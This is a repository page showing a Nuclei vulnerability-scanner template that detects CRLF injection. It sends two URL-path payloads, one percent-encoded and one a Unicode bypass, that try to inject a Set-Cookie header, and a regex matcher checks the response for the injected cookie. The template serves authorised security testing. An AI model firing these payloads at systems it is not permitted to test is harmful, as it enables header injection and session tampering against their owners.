daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/vulnerabilities/crlf-injection.yaml

18 lines
441 B
YAML
Raw Blame History

id: crlf-injection
info:
name: CRLF injection
author: nadino
severity: low
requests:
- method: GET
path:
- "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection"
- "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" # Unicode bypass
matchers:
- type: regex
regex:
- "(^Set-Cookie:|;(| ))( |)crlfinjection=crlfinjection($|;)"
part: header
Reference in New Issue View Git Blame Copy Permalink